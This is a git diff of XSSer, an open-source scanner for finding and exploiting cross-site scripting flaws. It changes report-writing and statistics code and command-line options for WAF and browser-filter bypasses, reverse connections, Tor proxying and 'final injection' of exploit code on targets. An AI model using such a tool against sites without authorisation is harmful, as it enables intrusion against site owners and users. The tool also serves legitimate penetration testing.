+                                fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
+                        else:
+                            if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                                fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
+                        fout.write("="*75 + "\n\n")
+
+        if self.options.fileoutput:
+            fout.close()
+        if self.options.fileoutput and not self.options.filexml:
+           self.report("[Info] Generating report: [ XSSreport.raw ]\n")
+           self.report("-"*25+"\n")
+        if self.options.fileoutput and self.options.filexml:
+           self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
+           self.report("-"*25+"\n")
+        if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
+            if not self.options.filexml: 
+                self.report("[Info] Aborting large screen output. Generating report: [ XSSreport.raw ]\n")
+                self.report("-"*25+"\n")
+                fout = open("XSSreport.raw", "w") # write better than append
+                fout.write("="*75)
+                fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                fout.write("="*75 + "\n\n")
+                for line in self.hash_found:
+                    if line[4]:
+                        if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                            fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        else:
+                            fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
+                    else:
+                        if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
+                            fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
+                        else:
+                            fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
+                    fout.write("="*75 + "\n\n")
+                fout.close()
+            else:
+                self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
+                self.report("-"*25+"\n")
+        # heuristic always with statistics
+        if self.options.heuristic:
+            heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
+            heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
+            heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
+            heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
+            heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
+            heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
+            heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
+            heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
+            total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
+            total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
+            total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
+            if total_heuris_notfound > 0: # not shown when not found
+                self.options.statistics = True
+	    # some statistics reports
+        if self.options.statistics:
+            # heuristic test results
+            if self.options.heuristic:
+                self.report("\n"+'='*75)
+                self.report("[+] Heuristics:")
+                self.report('='*75)
+                test_time = datetime.datetime.now() - self.time
+                self.report("\n" + '-'*50)
+                self.report("Test Time Duration: ", test_time)
+                self.report('-'*50  )
+                total_connections = total_heuris_found + total_heuris_notfound
+                self.report("Total fuzzed:", total_connections)
+                self.report('-'*75)
+                self.report('  ', "  <FILTERED!>", "  <NOT FILTERED!>", " =" , "  ASCII", "+", "UNE/HEX", "+", "DEC")
+                # semicolon results
+                self.report('; ',   "      ", self.heuris_semicolon_notfound, "             ", 
+                            heuris_semicolon_total_found, "             ",
+                            self.heuris_semicolon_found, "      ",
+                            self.heuris_une_semicolon_found, "     ",
+                            self.heuris_dec_semicolon_found)
+                # backslash results
+                self.report('\\ ',  "      ", self.heuris_backslash_notfound, "             ", 
+                            heuris_backslash_total_found, "             ",
+                            self.heuris_backslash_found, "      ",
+                            self.heuris_une_backslash_found, "     ",
+                            self.heuris_dec_backslash_found)
+                # slash results
+                self.report("/ ",   "      ", self.heuris_slash_notfound, "             ",
+                            heuris_slash_total_found, "             ",
+                            self.heuris_slash_found, "      ",
+                            self.heuris_une_slash_found, "     ",
+                            self.heuris_dec_slash_found)
+                # minor results
+                self.report("< ",   "      ", self.heuris_minor_notfound, "             ",
+                            heuris_minor_total_found, "             ",
+                            self.heuris_minor_found, "      ",
+                            self.heuris_une_minor_found, "     ",
+                            self.heuris_dec_minor_found)
+                # mayor results
+                self.report("> ",   "      ", self.heuris_mayor_notfound, "             ",
+                            heuris_mayor_total_found, "             ",
+                            self.heuris_mayor_found, "      ",
+                            self.heuris_une_mayor_found, "     ",
+                            self.heuris_dec_mayor_found)
+                # doublecolon results
+                self.report('" ',   "      ", self.heuris_doublecolon_notfound, "             ", 
+                            heuris_doublecolon_total_found, "             ",
+                            self.heuris_doublecolon_found, "      ",
+                            self.heuris_une_doublecolon_found, "     ",
+                            self.heuris_dec_doublecolon_found)
+                # colon results
+                self.report("' ",   "      ", self.heuris_colon_notfound, "             ",
+                            heuris_colon_total_found, "             ",
+                            self.heuris_colon_found, "      ",
+                            self.heuris_une_colon_found, "     ",
+                            self.heuris_dec_colon_found)
+                # equal results
+                self.report("= ",   "      ", self.heuris_equal_notfound, "             ",
+                            heuris_equal_total_found, "             ",
+                            self.heuris_equal_found, "      ",
+                            self.heuris_une_equal_found, "     ",
+                            self.heuris_dec_equal_found)
+                self.report('-'*75)
+                try:
+                    _accur = total_heuris_found * 100 / total_heuris_params
+                except ZeroDivisionError:
+                    _accur = 0
+                self.report('Target(s) Filtering Accur: %s %%' % _accur)
+                self.report('-'*75)
+            # statistics block
+            if len(self.hash_found) + len(self.hash_notfound) == 0:
+                pass
+            if self.options.heuristic:
+                pass
+            else:
+                self.report('='*75)
+                self.report("[+] Statistics:")
+                self.report('='*75)
+                test_time = datetime.datetime.now() - self.time
+                self.report("\n" + '-'*50)
+                self.report("Test Time Duration: ", test_time)
+                self.report('-'*50  )
+                total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
+                self.report("Total Connections:", total_connections)
+                self.report('-'*25)
+                self.report("200-OK:" , self.success_connection , "|",  "404:" ,
+                            self.not_connection , "|" , "503:" ,
+                            self.forwarded_connection , "|" , "Others:",
+                            self.other_connection)
+                try:
+                    _accur = self.success_connection * 100 / total_connections
+                except ZeroDivisionError:
+                    _accur = 0
+                self.report("Connec: %s %%" % _accur)
+                self.report('-'*50)
+                total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection 
+                self.report("Total Payloads:", total_payloads)
+                self.report('-'*25)
+                self.report("Checker:", self.check_positives,  "|", "Manual:",
+                            self.manual_injection, "|" , "Auto:" ,
+                            self.auto_injection ,"|", "DCP:",
+                            self.dcp_injection, "|", "DOM:", self.dom_injection,
+                            "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
+                            self.xsr_injection, "|", "XSA:",
+                            self.xsa_injection , "|", "COO:",
+                            self.coo_injection)
+                self.report('-'*50)
+                self.report("Total Injections:" , 
+                            len(self.hash_notfound) + len(self.hash_found))
+                self.report('-'*25)
+                self.report("Failed:" , len(self.hash_notfound), "|",
+                            "Successful:" , len(self.hash_found))
+                try:
+                    _accur = len(self.hash_found) * 100 / total_injections
+                except ZeroDivisionError:
+                    _accur = 0
+                self.report("Accur : %s %%" % _accur)
+                self.report("\n" + '='*50)
+                total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
+                self.report("\n" + '-'*50)
+                self.report("Total XSS Discovered:", total_discovered)
+                self.report('-'*50)
+                self.report("Checker:", self.false_positives, "|",
+                            "Manual:",self.manual_found, "|", "Auto:",
+                            self.auto_found, "|", "DCP:", self.dcp_found,
+                            "|", "DOM:", self.dom_found, "|", "Induced:",
+                            self.httpsr_found, "|" , "XSR:", self.xsr_found,
+                            "|", "XSA:", self.xsa_found, "|", "COO:",
+                            self.coo_found)
+                self.report('-'*50)
+                self.report("False positives:", self.false_positives, "|",
+                            "Vulnerables:",
+                            total_discovered - self.false_positives)
+                self.report('-'*25)
+	        # efficiency ranking:
+	        # algor= vulnerables + false positives - failed * extras
+                mana = 0
+                if self.hash_found > 3:
+                    mana = mana + 4500
+                if self.hash_found == 1:
+                    mana = mana + 500
+                if self.options.reversecheck:
+                    mana = mana + 200
+                if total_payloads > 100:
+                    mana = mana + 150
+                if not self.options.xsser_gtk:
+                    mana = mana + 25
+                if self.options.discode:
+                    mana = mana + 100
+                if self.options.proxy:
+                    mana = mana + 100
+                if self.options.threads > 9:
+                    mana = mana + 100
+                if self.options.heuristic:
+                    mana = mana + 100
+                if self.options.finalpayload or self.options.finalremote:
+                    mana = mana + 100
+                if self.options.script:
+                    mana = mana + 100
+                if self.options.Cem or self.options.Doo:
+                    mana = mana + 75
+                if self.options.heuristic:
+                    mana = mana + 50
+                if self.options.script and not self.options.fuzz:
+                    mana = mana + 25
+                if self.options.followred and self.options.fli:
+                    mana = mana + 25
+                if self.options.wizard:
+                    mana = mana + 25
+                if self.options.dcp:
+                    mana = mana + 25
+                if self.options.hash:
+                    mana = mana + 10
+                mana = (len(self.hash_found) * mana) + mana -4500
+                # enjoy it :)
+                self.report("Mana:", mana)
+                self.report("")
+        c = Curl()
+        if not len(self.hash_found) and self.hash_notfound:
+            if self.options.hash:
+                if self.options.statistics:
+                    self.report('='*75 + '\n')
+                self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
+            else:
+                if self.options.target or self.options.heuristic:
+                    self.report("")
+                if self.options.heuristic:
+                    pass
+                else:
+                    if self.options.statistics:
+                        self.report('='*75 + '\n')
+            if self.options.fileoutput:
+                fout = open("XSSreport.raw", "w") # write better than append
+                fout.write("="*75)
+                fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
+                fout.write("="*75 + "\n\n")
+                for h in self.hash_notfound:
+                    if h[2] == 'heuristic':
+                        if not h[4]:
+                            fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
+                        else:
+                            fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
+                    elif h[2] == 'hashing check':
+                        if not h[4]:
+                            fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
+                        else:
+                            fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
+                    else:
+                        if h[4]:
+                            if h[2] == "XSA":
+                               fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
+                            elif h[2] == "XSR":
+                               fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
+                            elif h[2] == "COO":
+                               fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
+                        else:
+                            if h[2] == "XSA":
+                               fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
+                            elif h[2] == "XSR":
+                               fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
+                            elif h[2] == "COO":
+                               fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
+                            else:
+                                fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
+                    fout.write("="*75 + "\n\n")
+                fout.close()
+        else:
+            # some exits and info for some bad situations:
+            if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
+                self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
+            if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
+                if self.options.xsser_gtk:
+                    self.report('='*75)
+                self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
+                self.report('='*75 + '\n')
+
+        # print results to xml file
+        if self.options.filexml:
+            xml_report_results = xml_reporting(self)
+            try:
+                xml_report_results.print_xml_results(self.options.filexml)
+            except:
+                return
+
+if __name__ == "__main__":
+    app = xsser()
+    options = app.create_options()
+    if options:
+        app.set_options(options)
+        app.run()
+    app.land(True)
diff --git a/xsser/core/mozchecker.py b/core/mozchecker.py
similarity index 97%
rename from xsser/core/mozchecker.py
rename to core/mozchecker.py
index de8a560..1a60afb 100644
--- a/xsser/core/mozchecker.py
+++ b/core/mozchecker.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/options.py b/core/options.py
similarity index 74%
rename from xsser/core/options.py
rename to core/options.py
index 18fdf05..93058e5 100644
--- a/xsser/core/options.py
+++ b/core/options.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -32,7 +30,7 @@ def __init__(self, *args):
         optparse.OptionParser.__init__(self, 
                            description='Cross Site "Scripter" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.',
                            prog='XSSer.py',
-			   version='\nXSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy\n',
+			   version='\nXSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net) - 2010/2019 -> by psy\n',
                            usage= '\n\nxsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}')
         self.set_defaults(verbose=False, threads=5, retries=1, delay=0, timeout=30,
                           silent=False)
@@ -69,55 +67,65 @@ def __init__(self, *args):
 
         group3 = optparse.OptionGroup(self, "*Select type of HTTP/HTTPS Connection(s)*",
         "These options can be used to specify which parameter(s) we want to use as payload(s). Set 'XSS' as keyword on the place(s) that you want to inject:")
-        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=3&q=XSS')")
+        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=XSS')")
         group3.add_option("-p", action="store", dest="postdata", help="Send payload using POST (ex: 'foo=1&bar=XSS')")
         group3.add_option("-c", action="store", dest="crawling", help="Number of urls to crawl on target(s): 1-99999")
-        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default 3)")
-        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default TRUE)") 
+        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default: 2)")
+        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default: FALSE)") 
         self.add_option_group(group3)
 
         group4 = optparse.OptionGroup(self, "*Configure Request(s)*",
-        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:") 
+        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:")
+        group4.add_option("--head", action="store_true", dest="nohead", help="Send a HEAD request before start a test")
         group4.add_option("--cookie", action="store", dest="cookie", help="Change your HTTP Cookie header")
         group4.add_option("--drop-cookie", action="store_true", dest="dropcookie", help="Ignore Set-Cookie header from response")
-        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default SPOOFED)")
-        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default NONE)")
+        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default: SPOOFED)")
+        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default: NONE)")
         group4.add_option("--xforw", action="store_true", dest="xforw", help="Set your HTTP X-Forwarded-For with random IP values")
         group4.add_option("--xclient", action="store_true", dest="xclient", help="Set your HTTP X-Client-IP with random IP values")
         group4.add_option("--headers", action="store", dest="headers", help="Extra HTTP headers newline separated")
         group4.add_option("--auth-type", action="store", dest="atype", help="HTTP Authentication type (Basic, Digest, GSS or NTLM)") 
         group4.add_option("--auth-cred", action="store", dest="acred", help="HTTP Authentication credentials (name:password)")
-        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)") 
+        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)")
+        group4.add_option("--check-tor", action="store_true", dest="checktor", help="Check to see if Tor is used properly")
         group4.add_option("--proxy", action="store", dest="proxy", help="Use proxy server (tor: http://localhost:8118)")
         group4.add_option("--ignore-proxy", action="store_true", dest="ignoreproxy", help="Ignore system default HTTP proxy")
-        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default 30)")
-        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when the connection timeouts (default 1)")
-        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent HTTP requests (default 5)") 
-        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each HTTP request (default 0)")
+        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default: 30)")
+        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when connection timeout (default: 1)")
+        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent requests (default: 5)") 
+        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each request (default: 0)")
         group4.add_option("--tcp-nodelay", action="store_true", dest="tcp_nodelay", help="Use the TCP_NODELAY option")
         group4.add_option("--follow-redirects", action="store_true", dest="followred", help="Follow server redirection responses (302)")
-        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default 50)")
+        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default: 50)")
         self.add_option_group(group4)
 
         group5 = optparse.OptionGroup(self, "*Checker Systems*",
         "These options are useful to know if your target is using filters against XSS attacks:")
-        group5.add_option("--hash", action="store_true", dest="hash", help="send a hash to check if target is repeating content")
-        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="discover parameters filtered by using heuristics")
-        group5.add_option("--discode", action="store", dest="discode", help="set code on reply to discard an injection")
-        group5.add_option("--checkaturl", action="store", dest="alt", help="check reply using: alternative url -> Blind XSS")
-        group5.add_option("--checkmethod", action="store", dest="altm", help="check reply using: GET or POST (default: GET)")
-        group5.add_option("--checkatdata", action="store", dest="ald", help="check reply using: alternative payload") 
-        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="establish a reverse connection from target to XSSer to certify that is 100% vulnerable (recommended!)")
+        group5.add_option("--hash", action="store_true", dest="hash", help="Send a hash to check if target is repeating content")
+        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="Discover parameters filtered by using heuristics")
+        group5.add_option("--discode", action="store", dest="discode", help="Set code on reply to discard an injection")
+        group5.add_option("--checkaturl", action="store", dest="alt", help="Check reply using: <alternative url> [aka BLIND-XSS]")
+        group5.add_option("--checkmethod", action="store", dest="altm", help="Check reply using: GET or POST (default: GET)")
+        group5.add_option("--checkatdata", action="store", dest="ald", help="Check reply using: <alternative payload>") 
+        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="Establish a reverse connection from target to XSSer")
+        group5.add_option("--reverse-open", action="store_true", dest="reverseopen", help="Open a web browser when a reverse check is established")
         self.add_option_group(group5)
 
         group6 = optparse.OptionGroup(self, "*Select Vector(s)*",
         "These options can be used to specify injection(s) code. Important if you don't want to inject a common XSS vector used by default. Choose only one option:")
-        group6.add_option("--payload", action="store", dest="script", help="OWN  - Inject your own code")
-        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO - Inject a list of vectors provided by XSSer")
+        group6.add_option("--payload", action="store", dest="script", help="OWN   - Inject your own code")
+        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO  - Inject a list of vectors provided by XSSer")
         self.add_option_group(group6)
 
+        group14 = optparse.OptionGroup(self, "*Select Payload(s)*",
+        "These options can be used to set the list of vectors provided by XSSer. Choose only if required:")
+        group14.add_option("--auto-set", action="store", dest="fzz_num", help="ASET  - Limit of vectors to inject (default: "+str(self.vectors_fuzz)+")")
+        group14.add_option("--auto-info", action="store_true", dest="fzz_info", help="AINFO - Select ONLY vectors with INFO (defaul: FALSE)")
+        group14.add_option("--auto-random", action="store_true", dest="fzz_rand", help="ARAND - Set random to order (default: FALSE)")
+        self.add_option_group(group14)
+
         group13 = optparse.OptionGroup(self, "*Anti-antiXSS Firewall rules*",
-        "These options can be used to try to bypass specific WAF/IDS products. Choose only if required:")
+        "These options can be used to try to bypass specific WAF/IDS products and some anti-XSS browser filters. Choose only if required:")
         group13.add_option("--Phpids0.6.5", action="store_true", dest="phpids065", help="PHPIDS (0.6.5) [ALL]")
         group13.add_option("--Phpids0.7", action="store_true", dest="phpids070", help="PHPIDS (0.7) [ALL]")
         group13.add_option("--Imperva", action="store_true", dest="imperva", help="Imperva Incapsula [ALL]")
@@ -126,6 +134,10 @@ def __init__(self, *args):
         group13.add_option("--Barracuda", action="store_true", dest="barracuda", help="Barracuda WAF [ALL]")
         group13.add_option("--Modsec", action="store_true", dest="modsec", help="Mod-Security [ALL]")
         group13.add_option("--Quickdefense", action="store_true", dest="quickdefense", help="QuickDefense [Chrome]")
+        group13.add_option("--Firefox", action="store_true", dest="firefox", help="Firefox 12 [& below]")
+        group13.add_option("--Chrome", action="store_true", dest="chrome", help="Chrome 19 & Firefox 12 [& below]")
+        group13.add_option("--Opera", action="store_true", dest="opera", help="Opera 10.5 [& below]")
+        group13.add_option("--Iexplorer", action="store_true", dest="iexplorer", help="IExplorer 9 & Firefox 12 [& below]")
         self.add_option_group(group13)
        
         group7 = optparse.OptionGroup(self, "*Select Bypasser(s)*",
@@ -142,60 +154,59 @@ def __init__(self, *args):
         self.add_option_group(group7)
 
         group8 = optparse.OptionGroup(self, "*Special Technique(s)*",
-        "These options can be used to inject code using different XSS techniques. You can choose multiple:")
+        "These options can be used to inject code using different XSS techniques and fuzzing vectors. You can choose multiple:")
         group8.add_option("--Coo", action="store_true", dest="coo", help="COO - Cross Site Scripting Cookie injection")
         group8.add_option("--Xsa", action="store_true", dest="xsa", help="XSA - Cross Site Agent Scripting")
         group8.add_option("--Xsr", action="store_true", dest="xsr", help="XSR - Cross Site Referer Scripting")
         group8.add_option("--Dcp", action="store_true", dest="dcp", help="DCP - Data Control Protocol injections")
         group8.add_option("--Dom", action="store_true", dest="dom", help="DOM - Document Object Model injections")
         group8.add_option("--Ind", action="store_true", dest="inducedcode", help="IND - HTTP Response Splitting Induced code")
-        group8.add_option("--Anchor", action="store_true", dest="anchor", help="ANC - Use Anchor Stealth payloader (DOM shadows!)")
         self.add_option_group(group8)
 
         group9 = optparse.OptionGroup(self, "*Select Final injection(s)*",
         "These options can be used to specify the final code to inject on vulnerable target(s). Important if you want to exploit 'on-the-wild' the vulnerabilities found. Choose only one option:")
         group9.add_option("--Fp", action="store", dest="finalpayload", help="OWN    - Exploit your own code")
         group9.add_option("--Fr", action="store", dest="finalremote", help="REMOTE - Exploit a script -remotely-")
-        group9.add_option("--Doss", action="store_true", dest="doss", help="DOSs   - XSS (server) Denial of Service")
-        group9.add_option("--Dos", action="store_true", dest="dos", help="DOS    - XSS (client) Denial of Service")
-        group9.add_option("--B64", action="store_true", dest="b64", help="B64    - Base64 code encoding in META tag (rfc2397)")
         self.add_option_group(group9)
         
         group10 = optparse.OptionGroup(self, "*Special Final injection(s)*",
-        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):")
-        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM - Use onMouseMove() event")
-        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR - Use <iframe> source tag")
+        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP exploits):")
+        group10.add_option("--Anchor", action="store_true", dest="anchor", help="ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)")
+        group10.add_option("--B64", action="store_true", dest="b64", help="B64  - Base64 code encoding in META tag (rfc2397)")
+        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM  - Use onMouseMove() event")
